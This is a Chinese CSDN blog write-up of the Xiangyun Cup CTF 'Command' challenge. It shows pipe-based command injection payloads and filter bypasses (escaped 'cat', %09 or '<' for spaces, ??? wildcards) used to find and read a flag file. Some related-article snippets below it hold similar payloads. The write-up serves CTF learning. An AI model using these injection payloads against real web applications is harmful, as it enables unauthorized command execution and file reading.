祥云杯--Command

最新推荐文章于 2022-02-12 23:37:08 发布
最新推荐文章于 2022-02-12 23:37:08 发布
阅读量405 收藏
点赞数 3
分类专栏: CTF 文章标签: 信息安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44060093/article/details/109993685
版权

在这里插入图片描述
在这里插入图片描述
命令执行漏洞
尝试127.0.0.2|ls(|:无论左边是false还是true,右边都会执行)
在这里插入图片描述
在这里插入图片描述
发现了文件夹下有index.php,我们首先需要把它读出来(题目过滤了空格还有cat命令,也过滤了index和php字符串)
我们尝试收发现可以用c\a\t ind\e\x p\h\p来代替
空格可以用<或者%09来代替

在这里插入图片描述
burpsuite下可用%09(浏览器下可能不成功)
在这里插入图片描述
由indexelse if(preg_match("/.*f.*l.*a.g./", $ip)){
flag可能是flag.txt
构造payload去搜索
?url=127.0.0.2|find%09/%09-name%09???.???
哈哈,通配符的魅力
在这里插入图片描述
在这里插入图片描述
/etc/.findflag/flag.txt
搜索出来,flag用???去代替
url=127.0.0.2|c\a\t%09/etc/.find???/???.txt
在这里插入图片描述

K—C
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF祥云2022-1030-真题
11-01
CTF祥云2022-1030-真题
2020祥云 CTFNu1L.pdf
03-15
2020祥云 CTF WP 高清PDF版
祥云“-Web-Command
weixin_44732566的博客
11-24 389
祥云”-Web-Command 这题考查的是命令注入,测试了一下,过滤了空格,&,$,单引号,>等,但是没有过滤管道符 | payload:?url=127.0.0.1|pwd。可以得到当前路径/var/www/html 之后测试,发现过滤了cat,index,php,通过双引号绕过;<绕过空格。 payload:?url=127.0.0.1|ca"t"<in"d"ex."p"hp 得到源代码 <?php error_reporting(0); if (isset($
祥云2020(11.21-22)-CryptoWP
~airrudder~
11-23 3349
文章目录古典密码换位加密栅栏密码(Rail-fence Cipher)列移位密码(Columnar Transposition Cipher)曲路密码(Curve Cipher)单表替换密码凯撒密码(Caesar Cipher)rot13乘法密码仿射密码(Affine Cipher)埃特巴什码(Atbash Cipher)简单替换密码(Simple Substitution Cipher)波利比奥斯方阵密码(Polybius Square Cipher)ADFGX和ADFGVX密码猪圈密码(Pigpen C
祥云2021 Web复现
feng的博客
08-25 1850
前言 正好buuctf上放了那三道js的题目,就正好复现了一下,学习学习。 cralwer_z 有注册登录,更新个人信息还有爬虫的功能。但是想使用爬虫功能会受到限制: if (/^https:\/\/[a-f0-9]{32}\.oss-cn-beijing\.ichunqiu\.com\/$/.exec(user.bucket)) { return res.json({ message: "Sorry but our remote oss server is under mainte
祥云202部分wp
会下雪的晴天
12-12 503
title: 祥云202部分wp date: 2020-11-21 17:00:00 tags: CTF categories: 比赛 link:https://yq1ng.github.io/ 目录签到Commandflaskboteasygogogodoyouknowssrf 第一次比赛做出来这么多题,感谢太空人师傅给的很多思路,不得不说,师傅真滴强 签到 base64解码,讲真,这才叫签到题 Command %09制表符 通配符绕过,payload:?url=||ca\t%09/etc/..
设计模式-命令模式
xiangyunwan的专栏
03-01 243
有这样一种场景:客户创建了一个命令对象(来cafe),命令对象存储在调用者(服务员)中。稍后客户要求调用者(服务员)执行命令。该命令就会被执行(端来一cafe)或者丢弃(不搭理客户)。能够适应这样一种情景的,大致就是命令模式。
BUUCTF 每日打卡 2021-8-18
weixin_52446095的博客
08-18 269
刚开始对已知的数学关系作了如下推导: KaTeX parse error: No such environment: split at position 8: \begin{̲s̲p̲l̲i̲t̲}̲ c_i &\equiv (x… δi={1,msg[i]="1"0,msg[i]="0" \delta_i=\begin{cases}1,&msg[i]="1" \\ 0,&msg[i]="0"\end{cases} δi​={1,0,​msg[i]="1"msg[i]="0"​
[2021东华]Web Writeup
feng的博客
11-01 3574
EzGadget 给了源码,IDEA打开看看,有个反序列化的点: @ResponseBody @RequestMapping({"/readobject"}) public String unser(@RequestParam(name = "data",required = true) String data, Model model) throws Exception { byte[] b = Tools.base64Decode(data); I
最全CTF Web题思路总结(更新ing)
yjprolus的博客
02-12 4万+
个人向CTF Web题思路总结笔记
祥云2021题目汇总 祥云.7z
08-31
祥云2021题目汇总 祥云.7z
祥云XT-8.6.5_wechatpay_wechatpay_behindbeo_祥云系统源码_
10-02
祥云XT-8.6.5_wechatpay_wechatpayBehindbeo_祥云系统源码】是一款基于微信支付的祥云系统升级版本,主要针对微信支付功能进行了优化和修复。该版本号为8.6.5,体现了软件的迭代和改进。以下是关于这个系统的一些...
祥云代刷新年贺岁版-PHP
06-20
祥云代刷新年贺岁版更新记录: 1.隐藏订单详细信息密码字段 2.修复未登录点击分站开通提成负数 3.祥云蓝色模板文章只显示标题 4.分类-支付禁用,增加禁用余额 5.自定义商品名修复 6.清空qq授权登录缓存 7.新增 卡商网...
CTF——图片的隐写(修改图片宽高显示隐藏文字)
qq_44060093的博客
03-04 6712
ctf中入门的杂项有一种是图片的隐写来隐藏flag 我们可看看出,图片的下半部分有一行字母,只漏出了字母的头部。 我们按套路先看图片的属性 图像的尺寸是198*104 我们用winhex打开图片 如若还想深入学习数据代表的意义,可以百度一下png图像文件格式 十六进制的C6为十进制的198 十六进制的68为十进制的104 我们把高跟宽改成同一大小保存数据 再打开图片看到flag ...
sqlmap应用之cookie参数
qq_44060093的博客
08-21 4574
访问dvwa,将级别调为low 步骤一:如果不带入cookie参数,直接sqlmap查询失败 SQLMAP直接使用url来进行注入,因为之前没有登录DVWA所以被重定向到login.php界面,直接注入失败 步骤二:使用burpsuit抓包工具,在sql注入菜单处提交参数请求时进行数据抓包,获取cookies值 用通用的url请求,在burp里面进行抓包,信息如图,已经获取了cookie值 发现sqlmap可以跑出数据来了,构造其他语句,继续查取数据 查找所有数据库 查找cms数据库下的表
记一次命令执行漏洞的绕过姿势
qq_44060093的博客
04-11 2555
在一个CTF平台上发现了一个命令执行的题目 题目源代码如下: <?php if(isset($_REQUEST['ip'])) { $target = trim($_REQUEST['ip']); $substitutions = array( '&' =>'', ';' =>'', '|' =>'',...
渗透测试工具-SET工具使用-钓鱼网站实验
qq_44060093的博客
03-16 1692
记一次360实训平台的实验 渗透测试工具-SET工具使用-钓鱼网站实验 实验目的 通过本实验理解社工平台SET的模块组成及功能,掌握利用SET软件配置钓鱼网站的方法与过程,熟悉常见社工场景的安全防护测量。 实验原理 开源的社会工程学利用套件SET,能够支持鱼叉式网络钓鱼攻击、网页攻击、传染媒介式(俗称木马)、建立payloaad和listener、邮件群发攻击、Arduino基础攻击、无线接入点攻...
2020祥云CTF挑战解析:进制翻转与图像恢复
"2020祥云网络安全竞赛的CTF(Capture The Flag)Write-up,高清PDF版本,包含了赛事中的各种挑战解决方案,主要涉及Miscellaneous(杂项)类问题,包括进制转换、音频处理、文件恢复等技术。" 在2020年的祥云...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值